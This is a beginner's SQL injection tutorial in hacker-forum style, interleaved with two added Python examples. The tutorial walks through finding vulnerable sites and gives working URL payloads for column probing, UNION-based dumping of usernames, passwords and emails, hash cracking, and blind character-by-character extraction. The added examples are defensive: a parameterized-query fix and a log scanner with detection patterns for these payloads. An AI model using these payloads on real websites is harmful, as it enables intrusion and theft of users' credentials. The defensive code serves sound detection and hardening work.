- This is a beginner's tutorial for SQL Injection written by
- p00l_b0y :)
- SQL stands for Structured Query Language and it's a programming
- language designed by IBM that basically stores data for a server
- in a table, similar to using a table in a spreadsheet. It is how the server
- will store the data. We can manipulate the database a website
- is using to store content using SQL injection, or as I will
- call it, sqli. The databases may contain usernames, user passwords,
- news articles, emails, and much more... anything the server is storing.
- First you need to find a vulnerable site. There are tons of tools
- that can tell you if it's vuln or not, but I will teach how to
- do it without a program, so you can understand it :)
- First you need to find out what features the database is using,
- like searches, registration or GET pages...
- This is what we will use: GET. Here is an example of how GET works...
- http://example.com/index.php?page=1
- The '?' followed by a name and then a value is what is known as a GET.
- The GET here is telling the server to grab all the
- info under the name "1" and to display it on the web page.
- So to get the data for "1" it must look it up in a database
- to show this info on the web page, so now we need to get this
- data from the database to see if it's vuln. We can check by
- typing this...
- http://example.com?page=1--
- IF there is an error displayed then we can continue, because
- this would tell an SQL server to ignore the last tick. If
- there is no error then find another website. Also,
- if it doesn't display anything then that doesn't mean
- it's not vuln.
- There are several programs to use for sqli; the most popular are
- Havij and SQLmap.
- NOTE:
- In this tutorial, I am not going to show you how to use a specific
- program, I am just going to show the basic outline of how sqli
- works so you can understand it and use it yourself. I MIGHT write
- a part 2 to this tut that shows how to use Havij, but I will see
- how this one goes first :)
- So there are three categories of data in a SQL database or server.
- They are: databases, tables, and columns.
- Databases contain tables, tables contain columns, columns
- contain information, the information we want.
- There are many different ways to get this info using different
- types of SQL injection.
- -Blind sqli
- -Signature Evasion
- -Filter bypass
- -poorly filtered strings
- -incorrect type handling
- The first form of sqli I will discuss
- in this tut is poorly filtered strings.
- Poorly filtered strings means that the web master
- did not do his job and didn't filter the GET info correctly; this
- creates a vuln for sqli. Now we will inject the SQL query by first finding
- out how many columns it has.
- Remember, databases contain tables, tables contain columns, columns
- contain information, the information we want.
- http://example.com?page=1 ORDER BY 1--
- http://example.com?page=1 ORDER BY 2--
- http://example.com?page=1 ORDER BY 3--
- http://example.com?page=1 ORDER BY 4--
- We have an error when we type ORDER BY 4--
- so this tells us there are 3 columns of info, get it?
- So we can combine the statements together with a
- UNION statement, meaning combine them...
- http://example.com?page=1 UNION ALL SELECT 1,2--
- This will now display the number of columns on your
- screen; the number it displays is the number we use
- to exploit the site. Now we will need to see what version
- of SQL the target is using to see if it's vuln...
- http://example.com?page=1 UNION ALL SELECT 1,@@version--
- This will display the version of the database.
- If the version is above 5 that means it is a
- MySQL database and still may be vuln. In this
- tutorial I will be exploiting column 1. Now we exploit
- the data from the MySQL database by typing this...
- http://example.com?page=1 UNION ALL SELECT 1,table_name FROM information_schema.tables--
- This will display the current tables that may have the info we want,
- so look for a table name that may have some precious info in it. Now we need to
- get the column names in which the info is stored...
- Remember, databases contain tables, tables contain columns, columns
- contain information, the information we want.
- http://example.com?page=1 UNION ALL SELECT 1,column_name FROM information_schema.columns WHERE table_name='[table]'--
- Replace [table] with the name of the table you want.
- This should display all the columns in the table,
- so look for a column called id, username, password, email etc.
- Passwords may be encrypted, so use an MD5 cracker to
- view them as plain text :) Type this to open the column of
- a user and their password
- http://example.com?page=1 UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email) FROM [table]--
- So [table] is the table we are in, concat means
- to group them together (username, password),
- and 0x3a means ':' in hex, so it displays
- all the bits that have the username and password.
- Your output will look something like this...
- username:password:email
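- The whole "poorly filtered strings" section comes down to one coding mistake: the GET value is pasted into the SQL text instead of being bound as a parameter. The following is an added example (not part of p00l_b0y's paste) that puts the vulnerable lookup next to the fixed one, on a constructed in-memory SQLite database standing in for the site's backend. Assumptions: a `pages` table with 3 columns (matching the ORDER BY probe above) and a `users` table holding the username/password/email data; SQLite uses `||` for string concatenation where MySQL uses concat(), and has no information_schema, so only the ORDER BY and UNION steps are reproduced.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database (not real data): a 3-column pages table
    and a users table with the kind of data the tutorial goes after."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome');
        INSERT INTO pages VALUES (2, 'About', 'About us');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'hash-placeholder', 'alice@example.com');
    """)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, page: str) -> list:
    """Poorly filtered string: the GET value goes straight into the SQL text,
    so anything after the number is executed as SQL."""
    sql = f"SELECT id, title, body FROM pages WHERE id = {page}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, page: str) -> list:
    """Hardened form: check the type first, then bind the value as a
    parameter so the database never sees user input as SQL syntax."""
    page_id = int(page)  # raises ValueError for anything that is not an integer
    return conn.execute(
        "SELECT id, title, body FROM pages WHERE id = ?", (page_id,)
    ).fetchall()


def order_by_probe_errors(conn: sqlite3.Connection, n: int) -> bool:
    """True if 'ORDER BY n--' makes the vulnerable query fail, which is how
    the tutorial counts columns (3 works, 4 errors for a 3-column query)."""
    try:
        vulnerable_lookup(conn, f"1 ORDER BY {n}--")
        return False
    except sqlite3.OperationalError:
        return True


def run_comparison() -> dict:
    """Send the tutorial's UNION payload (SQLite spelling) to both lookups."""
    conn = build_db()
    payload = ("1 UNION ALL SELECT 1, username || ':' || password || ':' || email, 3 "
               "FROM users--")
    vuln_rows = vulnerable_lookup(conn, payload)  # page row plus a leaked user row
    try:
        safe_lookup(conn, payload)
        safe_outcome = "accepted"
    except ValueError:
        safe_outcome = "rejected"  # the int() check refuses the payload outright
    return {
        "vulnerable_rows": len(vuln_rows),
        "leaked": vuln_rows[-1][1],  # the username:password:email string
        "safe": safe_outcome,
    }


if __name__ == "__main__":
    db = build_db()
    print("ORDER BY 3 errors:", order_by_probe_errors(db, 3))
    print("ORDER BY 4 errors:", order_by_probe_errors(db, 4))
    print(run_comparison())
```

- Note the two separate defences in safe_lookup: the type check rejects the payload before any SQL runs, and the `?` placeholder means even a string value would be compared as data, never parsed as a UNION. Either alone stops this class of bug; together they also give you a clean place to log rejected input.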
- The second form of sqli I will talk about in this
- tut is blind sqli. Some web masters might try
- and hide the errors when you type
- http://example.com?page=1--
- So then we will use blind sqli :)
- This is called a blind sqli attack because
- you will not see any error messages; it is a
- different technique. We are going to use
- benchmark() in this tut. So type this...
- http://example.com?page=1
- This should display the website; it's true.
- http://example.com?page=1 and 1=1
- This should also display the website; it's true.
- http://example.com?page=1 and 1=2
- This is not true, so if it does not display the
- website normally then it's vuln :)
- (see how it's called a blind sqli X) )
- Again, we will check the version of the database...
- http://example.com?page=1 and substring(@@version,1,1)=5
- So this will return true if the database is version 5.
- NOTE: substring means part of a string...
- So we will continue if it's version 5
- http://example.com/news.php?page=1 and (select 1 from mysql.user limit 0,1)=1
- If this doesn't work then you will have to find another
- technique for blind sqli, but if it works,
- then you can get more info.
- http://www.example.com/news.php?id=5 and (select 1 from [table] limit 0,1)=1
- Since this is a blind sqli, you will have to guess
- the table name, but web masters are people too,
- so try users, members, emails, usernames, etc.
- We are using limit 0,1 due to restrictions in the subselect.
- SO the fun part comes up next: guessing more tables
- and spamming the SQL query :) FUN!
- http://example.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
- This will pull the first character from the first row of info,
- then convert it to an ASCII value and compare it against the value 80.
- If it comes back with true, use the 80. If it's false then
- decrease the value 80 until it's true. Keep doing this till you come to
- a point where an increase by 1 is true, and a decrease by 1 is false.
- You now have your character. Use an ASCII chart from Google to help.
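- Every step in both sections leaves a distinctive trace in the web server's access log: the trailing `--`, ORDER BY with a number, UNION SELECT, @@version, the `and 1=2` true/false test, and the ascii(substring(...)) character-by-character loop. The following is an added example (not part of p00l_b0y's paste) of the detection side: a scanner that URL-decodes the query string of each request line and tags the patterns described above. The log lines are constructed for the example and are not from any real server; the regex rules are this example's own, and the `/news.php` and `/search.php` paths are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (example data, not from any real server). The
# first six mirror the tutorial's probes; the last is benign text that happens
# to contain "order by" and should not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=1-- HTTP/1.1" 500 0
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=1%20ORDER%20BY%204-- HTTP/1.1" 500 0
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=1%20UNION%20ALL%20SELECT%201,@@version-- HTTP/1.1" 200 611
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=1%20and%201=2 HTTP/1.1" 200 90
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /search.php?q=order+by+popularity HTTP/1.1" 200 2048
"""

# Apache/nginx combined-format request line: client, then the request target.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Each rule is named after the tutorial step it catches; matched against the
# decoded query string, case-insensitively where SQL keywords are involved.
RULES = [
    ("comment_terminator", re.compile(r"--(\s|$)")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
    ("boolean_tautology", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("char_by_char_extraction", re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I)),
    ("timing_probe", re.compile(r"\bbenchmark\s*\(", re.I)),
]


def decoded_query(request_path: str) -> str:
    """Return the URL-decoded query string of a request target ('' if none)."""
    _, sep, query = request_path.partition("?")
    return unquote_plus(query) if sep else ""


def scan_log(text: str) -> list:
    """Return one finding per request line whose query matches any rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, path = m.group(1), m.group(2)
        query = decoded_query(path)
        tags = [name for name, rx in RULES if rx.search(query)]
        if tags:
            findings.append({"line": lineno, "client": client,
                             "query": query, "tags": tags})
    return findings


def hits_by_client(findings: list) -> Counter:
    """Count flagged requests per client IP; a blind sqli loop shows up as a
    long run of hits from one address even when every response is 200."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'line {f["line"]} {f["client"]} {f["tags"]}: {f["query"]}')
    print(hits_by_client(found))
```

- Decoding before matching matters: the tutorial's payloads arrive as `%20`, `%3E` and `+`, so rules run on the raw line miss them. The per-client counter is the more useful signal for the blind technique, since each of those requests looks like a normal 200 on its own and only the volume and the monotonic change in the compared value give it away.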
- I will stop the tut here; it's long enough.
- I am tired as balls, so if you want to learn more
- ways of sqli like filter evasions and stuff, google it.
- I might make a part 2 to this tut if you guys like it :)
- We are legion.